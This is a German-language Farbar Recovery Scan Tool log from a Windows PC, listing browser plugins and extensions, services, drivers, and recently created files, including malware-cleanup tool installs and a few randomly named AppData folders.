FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR StartupUrls: Default -> "hxxps://www.google.ch/"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\****\AppData\Local\Google\Chrome\User Data\Default [2017-08-01]
CHR Extension: (Google*Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01]
CHR Extension: (Google Präsentationen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01]
CHR Extension: (Google Docs) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01]
CHR Extension: (Google Drive) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01]
CHR Extension: (YouTube) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01]
CHR Extension: (Bing) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-08-01]
CHR Extension: (Google Tabellen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01]
CHR Extension: (Avira Browserschutz) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-08-01]
CHR Extension: (Google Docs Offline) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01]
CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01]
CHR Extension: (Deutsch Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01]
CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01]
CHR Extension: (Google Mail) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01]
CHR Extension: (Chrome Media Router) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01]
CHR Extension: (Skype-Anrufe) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdvancedSystemCareService10; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [462624 2017-03-21] (IObit)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [1128432 2017-07-14] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [490968 2017-07-14] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [490968 2017-07-14] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1524216 2017-07-14] (Avira Operations GmbH & Co. KG)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [377976 2017-06-13] (Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe [322616 2017-07-13] (Avira Operations GmbH & Co. KG)
R2 AviraUpdaterService; C:\Program Files (x86)\Avira\SoftwareUpdater\Avira.SoftwareUpdater.ServiceHost.exe [102304 2017-07-25] (Avira Operations GmbH & Co. KG)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] ()
R2 DigitalWave.Update.Service; C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe [440808 2017-04-27] (Digital Wave Ltd.)
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com)
S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-05-12] (Hi-Rez Studios) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation)
R2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2016-10-28] (IObit)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation)
S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation)
S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts)
R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts)
S4 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-01] (Â© pdfforge GmbH.)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit)
R2 SpeedupService; C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.SpeedupService.exe [74800 2017-06-28] (Avira Operations GmbH & Co. KG)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 avdevprot; C:\WINDOWS\System32\DRIVERS\avdevprot.sys [60920 2017-06-15] (Avira Operations GmbH & Co. KG)
R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.)
R2 avgntflt; C:\WINDOWS\System32\DRIVERS\avgntflt.sys [167504 2017-06-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\WINDOWS\system32\DRIVERS\avipbb.sys [164824 2017-06-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\WINDOWS\system32\DRIVERS\avkmgr.sys [44488 2017-03-02] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\WINDOWS\system32\DRIVERS\avnetflt.sys [88488 2017-03-02] (Avira Operations GmbH & Co. KG)
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.)
S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm))
S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.)
R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek)
R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [30744 2017-03-09] (IObit)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert]
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-01 15:01 - 2017-08-01 15:02 - 000030378 _____ C:\Users\****\Desktop\FRST.txt
2017-08-01 12:37 - 2017-08-01 12:37 - 000003064 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (****)
2017-08-01 12:17 - 2017-08-01 12:53 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-08-01 12:17 - 2017-08-01 12:40 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\****\AppData\Local\Nybgy
2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-01 12:15 - 2017-08-01 12:40 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-08-01 12:14 - 2017-08-01 12:53 - 000000000 ____D C:\Users\****\Desktop\mbar
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Downloads\mbar-1.09.3.1001.exe
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Desktop\mbar-1.09.3.1001.exe
2017-08-01 12:04 - 2017-08-01 12:04 - 000003404 _____ C:\WINDOWS\System32\Tasks\Driver Booster Scheduler
2017-08-01 12:04 - 2017-08-01 12:04 - 000002327 _____ C:\Users\Public\Desktop\Driver Booster 4.lnk
2017-08-01 12:03 - 2017-08-01 12:03 - 015721672 _____ (IObit ) C:\Users\****\Downloads\driver_booster_setup(4.4.0.512).exe
2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP
2017-08-01 03:19 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\Documents\Simply Super Software
2017-08-01 03:19 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\Roaming\Simply Super Software
2017-08-01 03:19 - 2017-08-01 03:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2017-08-01 03:18 - 2017-08-01 03:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2017-08-01 03:18 - 2017-08-01 03:18 - 000000000 ____D C:\ProgramData\Simply Super Software
2017-08-01 03:17 - 2017-08-01 03:18 - 061167208 _____ (Simply Super Software ) C:\Users\****\Downloads\trjsetup695.exe
2017-08-01 03:17 - 2017-08-01 03:17 - 001524744 _____ C:\Users\****\Downloads\Trojan Remover - CHIP-Installer.exe
2017-08-01 03:16 - 2017-08-01 03:16 - 001524744 _____ C:\Users\****\Downloads\TCPView - CHIP-Installer.exe
2017-08-01 03:16 - 2017-08-01 03:16 - 000291606 _____ C:\Users\****\Downloads\TcpView-3.05.zip
2017-08-01 02:30 - 2017-08-01 02:30 - 001766912 _____ (Farbar) C:\Users\****\Downloads\FRST_19-04-17.exe
2017-08-01 02:24 - 2017-08-01 02:24 - 001777664 _____ (Farbar) C:\Users\****\Downloads\FRST.exe
2017-08-01 02:24 - 2017-08-01 02:24 - 001777664 _____ (Farbar) C:\Users\****\Desktop\FRST.exe
2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Downloads\FRST64.exe
2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Desktop\FRST64.exe
2017-08-01 02:15 - 2017-08-01 02:24 - 000630962 _____ C:\WINDOWS\ntbtlog.txt
2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\LocalLow\Mozilla
2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\****\AppData\Local\Mozilla
2017-08-01 02:04 - 2017-08-01 02:04 - 000001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-08-01 02:04 - 2017-08-01 02:04 - 000001186 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-08-01 02:04 - 2017-08-01 02:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-01 02:04 - 2017-08-01 02:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-01 02:03 - 2017-08-01 02:03 - 000266352 _____ (Mozilla) C:\Users\****\Downloads\Firefox Setup Stub 54.0.1.exe
2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-08-01 01:54 - 2017-08-01 01:54 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-01 01:54 - 000002290 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-01 01:45 - 2017-08-01 01:45 - 001130328 _____ (Google Inc.) C:\Users\****\Downloads\ChromeSetup (1).exe
2017-08-01 01:44 - 2017-08-01 01:44 - 001130328 _____ (Google Inc.) C:\Users\****\Downloads\ChromeSetup.exe
2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\****\AppData\Local\PDF24
2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Usidikujp
